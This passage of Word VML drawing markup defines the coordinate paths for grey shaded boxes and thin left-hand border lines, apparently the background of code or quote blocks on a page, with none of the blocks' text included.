12191,10484,12202,10484,12213,10484,12224,10484,12235,10484,12247,10484,12259,10484,12271,10484,12283,10484,12295,10484,12308,10484,12321,10484,12334,10484,12348,10484,12362,10484,12375,10484,12390,10484,12404,10484,12419,10484,12434,10484,12449,10484,12465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79,1510,12479,1510,12479,1510,12479,1510,12478,1510,12478,1510,12478,1510,12477,1510,12477,1510,12476,1510,12476,1510,12475,1510,12474,1510,12474,1510,12473,1510,12472,1510,12471,1510,12470,1510,12469,1510,12468,1510,12467,1510,12466,1510,12464,1510,12463,1510,12461,1510,12460,1510,12458,1510,12456,1510,12455,1510,12453,1510,12451,1510,12448,1510,12446,1510,12444,1510,12441,1510,12439,1510,12436,1510,12434,1510,12431,1510,12428,1510,12425,1510,12421,1510,12418,1510,12415,1510,12411,1510,12407,1510,12403,1510,12399,1510,12395,1510,12391,1510,12387,1510,12382,1510,12378,1510,12373,1510,12368,1510,12363,1510,12357,1510,12352,1510,12346,1510,12341,1510,12335,1510,12329,1510,12322,1510,12316,1510,12310,1510,12303,1510,12296,1510,12289,1510,12282,1510,12274,1510,12266,1510,12259,1510,12251,1510,12242,1510,12234,1510,12225,1510,12217,1510,12208,1510,12198,1510,12189,1510,12179,1510,12170,1510,12160,1510,12149,1510,12139,1510,12128,1510,12117,1510,12106,1510,12095,1510,12083,1510,12072,1510,12060,1510,12047,1510,12035,1510,12022,1510,12009,1510,11996,1510,11982,1510,11969,1510,11955,1510,11941,1510,11926,1510,11911,1510,11896,1510,11881,1510,11866,1510,11850e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:591.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11830" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:11830;width:30;height:650" coordorigin="1490,11830" coordsize="30,650" path="m1517,11850l1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11850,1517,11851,1517,11851,1517,11851,1517,11851,1517,11851,1517,11852,1517,11852,1517,11853,1517,11853,1517,11853,1517,11854,1517,11855,1517,11855,1517,11856,1517,11857,1517,11857,1517,11858,1517,11859,1517,11860,1517,11861,1517,11862,1517,11863,1517,11865,1517,11866,1517,11867,1517,11869,1517,11870,1517,11872,1517,11874,1517,11876,1517,11878,1517,11880,1517,11882,1517,11884,1517,11886,1517,11889,1517,11891,1517,11894,1517,11897,1517,11900,1517,11903,1517,11906,1517,11909,1517,11912,1517,11916,1517,11919,1517,11923,1517,11927,1517,11931,1517,11935,1517,11939,1517,11943,1517,11948,1517,11953,1517,11957,1517,11962,1517,11968,1517,11973,1517,11978,1517,11984,1517,11990,1517,11995,1517,12002,1517,12008,1517,12014,1517,12021,1517,12027,1517,12034,1517,12041,1517,12049,1517,12056,1517,12064,1517,12072,1517,12080,1517,12088,1517,12096,1517,12105,1517,12114,1517,12123,1517,12132,1517,12141,1517,12151,1517,12161,1517,12171,1517,12181,1517,12191,1517,12202,1517,12213,1517,12224,1517,12235,1517,12247,1517,12259,1517,12271,1517,12283,1517,12295,1517,12308,1517,12321,1517,12334,1517,12348,1517,12362,1517,12375,1517,12390,1517,12404,1517,12419,1517,12434,1517,12449,1517,12465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32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12470" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:12470;width:8990;height:650" coordorigin="1490,12470" coordsize="8990,65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1,10484,12481,10484,12481,10484,12481,10484,12481,10484,12481,10484,12482,10484,12482,10484,12482,10484,12483,10484,12483,10484,12483,10484,12484,10484,12484,10484,12485,10484,12486,10484,12486,10484,12487,10484,12488,10484,12489,10484,12490,10484,12491,10484,12492,10484,12493,10484,12494,10484,12495,10484,12497,10484,12498,10484,12500,10484,12501,10484,12503,10484,12505,10484,12507,10484,12509,10484,12511,10484,12513,10484,12515,10484,12518,10484,12520,10484,12523,10484,12525,10484,12528,10484,12531,10484,12534,10484,12537,10484,12541,10484,12544,10484,12548,10484,12551,10484,12555,10484,12559,10484,12563,10484,12567,10484,12572,10484,12576,10484,12581,10484,12585,10484,12590,10484,12595,10484,12601,10484,12606,10484,12612,10484,12617,10484,12623,10484,12629,10484,12635,10484,12642,10484,12648,10484,12655,10484,12662,10484,12669,10484,12676,10484,12684,10484,12691,10484,12699,10484,12707,10484,12715,10484,12724,10484,12732,10484,12741,10484,12750,10484,12759,10484,12769,10484,12778,10484,12788,10484,12798,10484,12809,10484,12819,10484,12830,10484,12841,10484,12852,10484,12863,10484,12875,10484,12887,10484,12899,10484,12911,10484,12924,10484,12936,10484,12949,10484,12963,10484,12976,10484,12990,10484,13004,10484,13018,10484,13033,10484,13048,10484,13063,10484,13078,10484,13094,10484,13109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5,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13125,1510,13124,1510,13124,1510,13124,1510,13123,1510,13123,1510,13123,1510,13122,1510,13122,1510,13121,1510,13120,1510,13120,1510,13119,1510,13118,1510,13117,1510,13116,1510,13115,1510,13114,1510,13113,1510,13112,1510,13111,1510,13109,1510,13108,1510,13106,1510,13105,1510,13103,1510,13101,1510,13099,1510,13097,1510,13095,1510,13093,1510,13091,1510,13088,1510,13086,1510,13083,1510,13081,1510,13078,1510,13075,1510,13072,1510,13069,1510,13065,1510,13062,1510,13058,1510,13055,1510,13051,1510,13047,1510,13043,1510,13039,1510,13034,1510,13030,1510,13025,1510,13020,1510,13016,1510,13010,1510,13005,1510,13000,1510,12994,1510,12989,1510,12983,1510,12977,1510,12970,1510,12964,1510,12958,1510,12951,1510,12944,1510,12937,1510,12930,1510,12922,1510,12914,1510,12907,1510,12899,1510,12890,1510,12882,1510,12873,1510,12865,1510,12856,1510,12846,1510,12837,1510,12827,1510,12818,1510,12808,1510,12797,1510,12787,1510,12776,1510,12765,1510,12754,1510,12743,1510,12731,1510,12719,1510,12707,1510,12695,1510,12682,1510,12670,1510,12656,1510,12643,1510,12630,1510,12616,1510,12602,1510,12588,1510,12573,1510,12558,1510,12543,1510,12528,1510,12512,1510,12496,1510,12480e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:623.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12470" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:12470;width:30;height:650" coordorigin="1490,12470" coordsize="30,650" path="m1517,12480l1517,12480,1517,12480,1517,12480,1517,12480,1517,12480,1517,12480,1517,12480,1517,12480,1517,12480,1517,12481,1517,12481,1517,12481,1517,12481,1517,12481,1517,12481,1517,12482,1517,12482,1517,12482,1517,12483,1517,12483,1517,12483,1517,12484,1517,12484,1517,12485,1517,12486,1517,12486,1517,12487,1517,12488,1517,12489,1517,12490,1517,12491,1517,12492,1517,12493,1517,12494,1517,12495,1517,12497,1517,12498,1517,12500,1517,12501,1517,12503,1517,12505,1517,12507,1517,12509,1517,12511,1517,12513,1517,12515,1517,12518,1517,12520,1517,12523,1517,12525,1517,12528,1517,12531,1517,12534,1517,12537,1517,12541,1517,12544,1517,12548,1517,12551,1517,12555,1517,12559,1517,12563,1517,12567,1517,12572,1517,12576,1517,12581,1517,12585,1517,12590,1517,12595,1517,12601,1517,12606,1517,12612,1517,12617,1517,12623,1517,12629,1517,12635,1517,12642,1517,12648,1517,12655,1517,12662,1517,12669,1517,12676,1517,12684,1517,12691,1517,12699,1517,12707,1517,12715,1517,12724,1517,12732,1517,12741,1517,12750,1517,12759,1517,12769,1517,12778,1517,12788,1517,12798,1517,12809,1517,12819,1517,12830,1517,12841,1517,12852,1517,12863,1517,12875,1517,12887,1517,12899,1517,12911,1517,12924,1517,12936,1517,12949,1517,12963,1517,12976,1517,12990,1517,13004,1517,13018,1517,13033,1517,13048,1517,13063,1517,13078,1517,13094,1517,13109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31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13110" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:13110;width:8990;height:630" coordorigin="1490,13110" coordsize="8990,63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7,10484,13127,10484,13127,10484,13127,10484,13128,10484,13128,10484,13129,10484,13129,10484,13130,10484,13130,10484,13131,10484,13131,10484,13132,10484,13133,10484,13134,10484,13135,10484,13136,10484,13137,10484,13138,10484,13139,10484,13140,10484,13142,10484,13143,10484,13145,10484,13146,10484,13148,10484,13150,10484,13151,10484,13153,10484,13155,10484,13157,10484,13160,10484,13162,10484,13164,10484,13167,10484,13170,10484,13172,10484,13175,10484,13178,10484,13181,10484,13185,10484,13188,10484,13191,10484,13195,10484,13199,10484,13202,10484,13206,10484,13211,10484,13215,10484,13219,10484,13224,10484,13228,10484,13233,10484,13238,10484,13243,10484,13248,10484,13254,10484,13259,10484,13265,10484,13271,10484,13277,10484,13283,10484,13290,10484,13296,10484,13303,10484,13310,10484,13317,10484,13324,10484,13332,10484,13339,10484,13347,10484,13355,10484,13364,10484,13372,10484,13381,10484,13389,10484,13398,10484,13407,10484,13417,10484,13426,10484,13436,10484,13446,10484,13457,10484,13467,10484,13478,10484,13489,10484,13500,10484,13511,10484,13523,10484,13534,10484,13546,10484,13559,10484,13571,10484,13584,10484,13597,10484,13610,10484,13623,10484,13637,10484,13651,10484,13665,10484,13680,10484,13694,10484,13709,10484,13725,10484,13740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5,1510,13755,1510,13755,1510,13755,1510,13755,1510,13754,1510,13754,1510,13754,1510,13753,1510,13753,1510,13752,1510,13752,1510,13751,1510,13751,1510,13750,1510,13749,1510,13749,1510,13748,1510,13747,1510,13746,1510,13745,1510,13744,1510,13742,1510,13741,1510,13740,1510,13738,1510,13737,1510,13735,1510,13734,1510,13732,1510,13730,1510,13728,1510,13726,1510,13724,1510,13722,1510,13720,1510,13717,1510,13715,1510,13712,1510,13709,1510,13706,1510,13703,1510,13700,1510,13697,1510,13694,1510,13690,1510,13687,1510,13683,1510,13679,1510,13675,1510,13671,1510,13667,1510,13662,1510,13658,1510,13653,1510,13648,1510,13643,1510,13638,1510,13633,1510,13628,1510,13622,1510,13616,1510,13610,1510,13604,1510,13598,1510,13592,1510,13585,1510,13578,1510,13572,1510,13564,1510,13557,1510,13550,1510,13542,1510,13534,1510,13526,1510,13518,1510,13510,1510,13501,1510,13492,1510,13483,1510,13474,1510,13465,1510,13455,1510,13445,1510,13435,1510,13425,1510,13415,1510,13404,1510,13393,1510,13382,1510,13371,1510,13359,1510,13347,1510,13335,1510,13323,1510,13310,1510,13298,1510,13285,1510,13272,1510,13258,1510,13244,1510,13230,1510,13216,1510,13202,1510,13187,1510,13172,1510,13157,1510,13141,1510,13126e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:655.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13110" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:13110;width:30;height:650" coordorigin="1490,13110" coordsize="30,650" path="m1517,13126l1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13126,1517,13127,1517,13127,1517,13127,1517,13127,1517,13128,1517,13128,1517,13129,1517,13129,1517,13130,1517,13130,1517,13131,1517,13131,1517,13132,1517,13133,1517,13134,1517,13135,1517,13136,1517,13137,1517,13138,1517,13139,1517,13140,1517,13142,1517,13143,1517,13145,1517,13146,1517,13148,1517,13150,1517,13151,1517,13153,1517,13155,1517,13157,1517,13160,1517,13162,1517,13164,1517,13167,1517,13170,1517,13172,1517,13175,1517,13178,1517,13181,1517,13185,1517,13188,1517,13191,1517,13195,1517,13199,1517,13202,1517,13206,1517,13211,1517,13215,1517,13219,1517,13224,1517,13228,1517,13233,1517,13238,1517,13243,1517,13248,1517,13254,1517,13259,1517,13265,1517,13271,1517,13277,1517,13283,1517,13290,1517,13296,1517,13303,1517,13310,1517,13317,1517,13324,1517,13332,1517,13339,1517,13347,1517,13355,1517,13364,1517,13372,1517,13381,1517,13389,1517,13398,1517,13407,1517,13417,1517,13426,1517,13436,1517,13446,1517,13457,1517,13467,1517,13478,1517,13489,1517,13500,1517,13511,1517,13523,1517,13534,1517,13546,1517,13559,1517,13571,1517,13584,1517,13597,1517,13610,1517,13623,1517,13637,1517,13651,1517,13665,1517,13680,1517,13694,1517,13709,1517,13725,1517,13740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33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13730" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:13730;width:8990;height:670" coordorigin="1490,13730" coordsize="8990,67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7,10484,13757,10484,13757,10484,13757,10484,13757,10484,13758,10484,13758,10484,13759,10484,13759,10484,13759,10484,13760,10484,13761,10484,13761,10484,13762,10484,13763,10484,13763,10484,13764,10484,13765,10484,13766,10484,13767,10484,13768,10484,13770,10484,13771,10484,13772,10484,13774,10484,13775,10484,13777,10484,13779,10484,13780,10484,13782,10484,13784,10484,13786,10484,13789,10484,13791,10484,13793,10484,13796,10484,13798,10484,13801,10484,13804,10484,13807,10484,13810,10484,13813,10484,13816,10484,13820,10484,13823,10484,13827,10484,13831,10484,13835,10484,13839,10484,13843,10484,13847,10484,13852,10484,13856,10484,13861,10484,13866,10484,13871,10484,13876,10484,13882,10484,13887,10484,13893,10484,13899,10484,13905,10484,13911,10484,13917,10484,13924,10484,13931,10484,13938,10484,13945,10484,13952,10484,13959,10484,13967,10484,13975,10484,13983,10484,13991,10484,14000,10484,14008,10484,14017,10484,14026,10484,14035,10484,14045,10484,14054,10484,14064,10484,14074,10484,14084,10484,14095,10484,14105,10484,14116,10484,14127,10484,14139,10484,14150,10484,14162,10484,14174,10484,14187,10484,14199,10484,14212,10484,14225,10484,14238,10484,14252,10484,14266,10484,14280,10484,14294,10484,14308,10484,14323,10484,14338,10484,14354,10484,14369,10484,14385,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10483,14401,10482,14401,10482,14401,10480,14401,10479,14401,10477,14401,10475,14401,10473,14401,10470,14401,10466,14401,10462,14401,10458,14401,10453,14401,10448,14401,10442,14401,10435,14401,10428,14401,10419,14401,10411,14401,10401,14401,10391,14401,10379,14401,10367,14401,10354,14401,10340,14401,10326,14401,10310,14401,10293,14401,10275,14401,10256,14401,10236,14401,10215,14401,10192,14401,10168,14401,10143,14401,10117,14401,10090,14401,10061,14401,10031,14401,9999,14401,9966,14401,9931,14401,9895,14401,9858,14401,9819,14401,9778,14401,9735,14401,9691,14401,9646,14401,9598,14401,9549,14401,9498,14401,9445,14401,9391,14401,9334,14401,9275,14401,9215,14401,9153,14401,9088,14401,9022,14401,8953,14401,8883,14401,8810,14401,8735,14401,8658,14401,8578,14401,8497,14401,8413,14401,8326,14401,8238,14401,8146,14401,8053,14401,7957,14401,7859,14401,7758,14401,7654,14401,7548,14401,7439,14401,7328,14401,7214,14401,7097,14401,6977,14401,6855,14401,6730,14401,6602,14401,6471,14401,6337,14401,6201,14401,6061,14401,5918,14401,5773,14401,5624,14401,5472,14401,5317,14401,5159,14401,4997,14401,4833,14401,4665,14401,4494,14401,4319,14401,4141,14401,3960,14401,3776,14401,3587,14401,3396,14401,3201,14401,3002,14401,2800,14401,2594,14401,2385,14401,2172,14401,1955,14401,1734,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14400,1510,14400,1510,14400,1510,14400,1510,14399,1510,14399,1510,14399,1510,14398,1510,14398,1510,14397,1510,14397,1510,14396,1510,14395,1510,14395,1510,14394,1510,14393,1510,14392,1510,14391,1510,14390,1510,14389,1510,14387,1510,14386,1510,14385,1510,14383,1510,14382,1510,14380,1510,14379,1510,14377,1510,14375,1510,14373,1510,14371,1510,14369,1510,14366,1510,14364,1510,14361,1510,14359,1510,14356,1510,14353,1510,14350,1510,14347,1510,14344,1510,14341,1510,14338,1510,14334,1510,14330,1510,14327,1510,14323,1510,14319,1510,14314,1510,14310,1510,14305,1510,14301,1510,14296,1510,14291,1510,14286,1510,14281,1510,14275,1510,14270,1510,14264,1510,14258,1510,14252,1510,14246,1510,14240,1510,14233,1510,14226,1510,14220,1510,14212,1510,14205,1510,14198,1510,14190,1510,14182,1510,14174,1510,14166,1510,14158,1510,14149,1510,14140,1510,14131,1510,14122,1510,14113,1510,14103,1510,14093,1510,14083,1510,14073,1510,14062,1510,14052,1510,14041,1510,14030,1510,14018,1510,14007,1510,13995,1510,13983,1510,13970,1510,13958,1510,13945,1510,13932,1510,13919,1510,13905,1510,13892,1510,13878,1510,13863,1510,13849,1510,13834,1510,13819,1510,13804,1510,13788,1510,13772,1510,13756e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:687.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13750" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:13750;width:30;height:650" coordorigin="1490,13750" coordsize="30,650" path="m1517,13756l1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13756,1517,13757,1517,13757,1517,13757,1517,13757,1517,13757,1517,13758,1517,13758,1517,13759,1517,13759,1517,13759,1517,13760,1517,13761,1517,13761,1517,13762,1517,13763,1517,13763,1517,13764,1517,13765,1517,13766,1517,13767,1517,13768,1517,13770,1517,13771,1517,13772,1517,13774,1517,13775,1517,13777,1517,13779,1517,13780,1517,13782,1517,13784,1517,13786,1517,13789,1517,13791,1517,13793,1517,13796,1517,13798,1517,13801,1517,13804,1517,13807,1517,13810,1517,13813,1517,13816,1517,13820,1517,13823,1517,13827,1517,13831,1517,13835,1517,13839,1517,13843,1517,13847,1517,13852,1517,13856,1517,13861,1517,13866,1517,13871,1517,13876,1517,13882,1517,13887,1517,13893,1517,13899,1517,13905,1517,13911,1517,13917,1517,13924,1517,13931,1517,13938,1517,13945,1517,13952,1517,13959,1517,13967,1517,13975,1517,13983,1517,13991,1517,14000,1517,14008,1517,14017,1517,14026,1517,14035,1517,14045,1517,14054,1517,14064,1517,14074,1517,14084,1517,14095,1517,14105,1517,14116,1517,14127,1517,14139,1517,14150,1517,14162,1517,14174,1517,14187,1517,14199,1517,14212,1517,14225,1517,14238,1517,14252,1517,14266,1517,14280,1517,14294,1517,14308,1517,14323,1517,14338,1517,14354,1517,14369,1517,14385,1517,14401e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:719.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14390" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:14390;width:8990;height:630" coordorigin="1490,14390" coordsize="8990,630" path="m1510,14401l1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1510,14401,1511,14401,1512,14401,1512,14401,1514,14401,1515,14401,1517,14401,1519,14401,1521,14401,1524,14401,1528,14401,1532,14401,1536,14401,1541,14401,1546,14401,1552,14401,1559,14401,1566,14401,1575,14401,1583,14401,1593,14401,1603,14401,1615,14401,1627,14401,1640,14401,1654,14401,1668,14401,1684,14401,1701,14401,1719,14401,1738,14401,1758,14401,1780,14401,1802,14401,1826,14401,1851,14401,1877,14401,1904,14401,1933,14401,1963,14401,1995,14401,2028,14401,2063,14401,2099,14401,2136,14401,2175,14401,2216,14401,2259,14401,2303,14401,2348,14401,2396,14401,2445,14401,2496,14401,2549,14401,2604,14401,2660,14401,2719,14401,2779,14401,2841,14401,2906,14401,2972,14401,3041,14401,3112,14401,3184,14401,3259,14401,3336,14401,3416,14401,3498,14401,3582,14401,3668,14401,3757,14401,3848,14401,3941,14401,4037,14401,4136,14401,4236,14401,4340,14401,4446,14401,4555,14401,4666,14401,4780,14401,4897,14401,5017,14401,5139,14401,5264,14401,5392,14401,5523,14401,5657,14401,5793,14401,5933,14401,6076,14401,6222,14401,6370,14401,6522,14401,6677,14401,6835,14401,6997,14401,7161,14401,7329,14401,7500,14401,7675,14401,7853,14401,8034,14401,8219,14401,8407,14401,8598,14401,8793,14401,8992,14401,9194,14401,9400,14401,9609,14401,9823,14401,10039,14401,10260,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14401,10484,14402,10484,14402,10484,14402,10484,14402,10484,14402,10484,14402,10484,14403,10484,14403,10484,14403,10484,14403,10484,14404,10484,14404,10484,14405,10484,14405,10484,14406,10484,14406,10484,14407,10484,14408,10484,14409,10484,14409,10484,14410,10484,14411,10484,14412,10484,14414,10484,14415,10484,14416,10484,14417,10484,14419,10484,14420,10484,14422,10484,14423,10484,14425,10484,14427,10484,14429,10484,14431,10484,14433,10484,14435,10484,14438,10484,14440,10484,14443,10484,14445,10484,14448,10484,14451,10484,14454,10484,14457,10484,14460,10484,14463,10484,14467,10484,14471,10484,14474,10484,14478,10484,14482,10484,14486,10484,14490,10484,14495,10484,14499,10484,14504,10484,14509,10484,14514,10484,14519,10484,14524,10484,14530,10484,14535,10484,14541,10484,14547,10484,14553,10484,14559,10484,14565,10484,14572,10484,14579,10484,14586,10484,14593,10484,14600,10484,14607,10484,14615,10484,14623,10484,14631,10484,14639,10484,14648,10484,14656,10484,14665,10484,14674,10484,14683,10484,14693,10484,14702,10484,14712,10484,14722,10484,14732,10484,14743,10484,14753,10484,14764,10484,14775,10484,14787,10484,14798,10484,14810,10484,14822,10484,14834,10484,14847,10484,14859,10484,14872,10484,14886,10484,14899,10484,14913,10484,14927,10484,14941,10484,14955,10484,14970,10484,14985,10484,15000,10484,15016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1,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15031,1510,15030,1510,15030,1510,15030,1510,15029,1510,15029,1510,15029,1510,15028,1510,15028,1510,15027,1510,15026,1510,15026,1510,15025,1510,15024,1510,15023,1510,15022,1510,15021,1510,15020,1510,15019,1510,15018,1510,15017,1510,15016,1510,15014,1510,15013,1510,15011,1510,15009,1510,15008,1510,15006,1510,15004,1510,15002,1510,15000,1510,14997,1510,14995,1510,14993,1510,14990,1510,14988,1510,14985,1510,14982,1510,14979,1510,14976,1510,14973,1510,14969,1510,14966,1510,14962,1510,14959,1510,14955,1510,14951,1510,14947,1510,14942,1510,14938,1510,14934,1510,14929,1510,14924,1510,14919,1510,14914,1510,14909,1510,14903,1510,14898,1510,14892,1510,14886,1510,14880,1510,14874,1510,14867,1510,14861,1510,14854,1510,14847,1510,14840,1510,14833,1510,14825,1510,14818,1510,14810,1510,14802,1510,14794,1510,14785,1510,14777,1510,14768,1510,14759,1510,14750,1510,14740,1510,14731,1510,14721,1510,14711,1510,14701,1510,14690,1510,14680,1510,14669,1510,14658,1510,14646,1510,14635,1510,14623,1510,14611,1510,14599,1510,14586,1510,14573,1510,14560,1510,14547,1510,14534,1510,14520,1510,14506,1510,14492,1510,14477,1510,14463,1510,14448,1510,14432,1510,14417,1510,14401e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:719.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14390" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:14390;width:30;height:630" coordorigin="1490,14390" coordsize="30,630" path="m1517,14401l1517,14401,1517,14401,1517,14401,1517,14401,1517,14401,1517,14401,1517,14401,1517,14401,1517,14401,1517,14402,1517,14402,1517,14402,1517,14402,1517,14402,1517,14402,1517,14403,1517,14403,1517,14403,1517,14403,1517,14404,1517,14404,1517,14405,1517,14405,1517,14406,1517,14406,1517,14407,1517,14408,1517,14409,1517,14409,1517,14410,1517,14411,1517,14412,1517,14414,1517,14415,1517,14416,1517,14417,1517,14419,1517,14420,1517,14422,1517,14423,1517,14425,1517,14427,1517,14429,1517,14431,1517,14433,1517,14435,1517,14438,1517,14440,1517,14443,1517,14445,1517,14448,1517,14451,1517,14454,1517,14457,1517,14460,1517,14463,1517,14467,1517,14471,1517,14474,1517,14478,1517,14482,1517,14486,1517,14490,1517,14495,1517,14499,1517,14504,1517,14509,1517,14514,1517,14519,1517,14524,1517,14530,1517,14535,1517,14541,1517,14547,1517,14553,1517,14559,1517,14565,1517,14572,1517,14579,1517,14586,1517,14593,1517,14600,1517,14607,1517,14615,1517,14623,1517,14631,1517,14639,1517,14648,1517,14656,1517,14665,1517,14674,1517,14683,1517,14693,1517,14702,1517,14712,1517,14722,1517,14732,1517,14743,1517,14753,1517,14764,1517,14775,1517,14787,1517,14798,1517,14810,1517,14822,1517,14834,1517,14847,1517,14859,1517,14872,1517,14886,1517,14899,1517,14913,1517,14927,1517,14941,1517,14955,1517,14970,1517,14985,1517,15000,1517,15016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32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15010" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:15010;width:8990;height:650" coordorigin="1490,15010" coordsize="8990,65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3,10484,15034,10484,15034,10484,15035,10484,15035,10484,15036,10484,15036,10484,15037,10484,15038,10484,15038,10484,15039,10484,15040,10484,15041,10484,15042,10484,15043,10484,15044,10484,15045,10484,15047,10484,15048,10484,15049,10484,15051,10484,15053,10484,15054,10484,15056,10484,15058,10484,15060,10484,15062,10484,15064,10484,15066,10484,15069,10484,15071,10484,15074,10484,15077,10484,15079,10484,15082,10484,15085,10484,15089,10484,15092,10484,15095,10484,15099,10484,15102,10484,15106,10484,15110,10484,15114,10484,15118,10484,15123,10484,15127,10484,15132,10484,15137,10484,15142,10484,15147,10484,15152,10484,15157,10484,15163,10484,15169,10484,15175,10484,15181,10484,15187,10484,15193,10484,15200,10484,15206,10484,15213,10484,15220,10484,15228,10484,15235,10484,15243,10484,15251,10484,15259,10484,15267,10484,15275,10484,15284,10484,15293,10484,15302,10484,15311,10484,15320,10484,15330,10484,15340,10484,15350,10484,15360,10484,15370,10484,15381,10484,15392,10484,15403,10484,15415,10484,15426,10484,15438,10484,15450,10484,15462,10484,15475,10484,15488,10484,15501,10484,15514,10484,15527,10484,15541,10484,15555,10484,15570,10484,15584,10484,15599,10484,15614,10484,15629,10484,15645,10484,15661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6,1510,15676,1510,15676,1510,15676,1510,15676,1510,15675,1510,15675,1510,15675,1510,15674,1510,15674,1510,15673,1510,15673,1510,15672,1510,15672,1510,15671,1510,15670,1510,15669,1510,15668,1510,15668,1510,15667,1510,15665,1510,15664,1510,15663,1510,15662,1510,15660,1510,15659,1510,15657,1510,15656,1510,15654,1510,15652,1510,15650,1510,15649,1510,15646,1510,15644,1510,15642,1510,15640,1510,15637,1510,15635,1510,15632,1510,15629,1510,15626,1510,15623,1510,15620,1510,15617,1510,15613,1510,15610,1510,15606,1510,15602,1510,15598,1510,15594,1510,15590,1510,15586,1510,15581,1510,15577,1510,15572,1510,15567,1510,15562,1510,15556,1510,15551,1510,15546,1510,15540,1510,15534,1510,15528,1510,15522,1510,15515,1510,15509,1510,15502,1510,15495,1510,15488,1510,15481,1510,15473,1510,15466,1510,15458,1510,15450,1510,15442,1510,15433,1510,15425,1510,15416,1510,15407,1510,15398,1510,15388,1510,15379,1510,15369,1510,15359,1510,15349,1510,15338,1510,15327,1510,15316,1510,15305,1510,15294,1510,15282,1510,15271,1510,15258,1510,15246,1510,15234,1510,15221,1510,15208,1510,15194,1510,15181,1510,15167,1510,15153,1510,15139,1510,15124,1510,15110,1510,15094,1510,15079,1510,15064,1510,15048,1510,15032e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:750.500pt;width:1.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15010" coordsize="30,670">
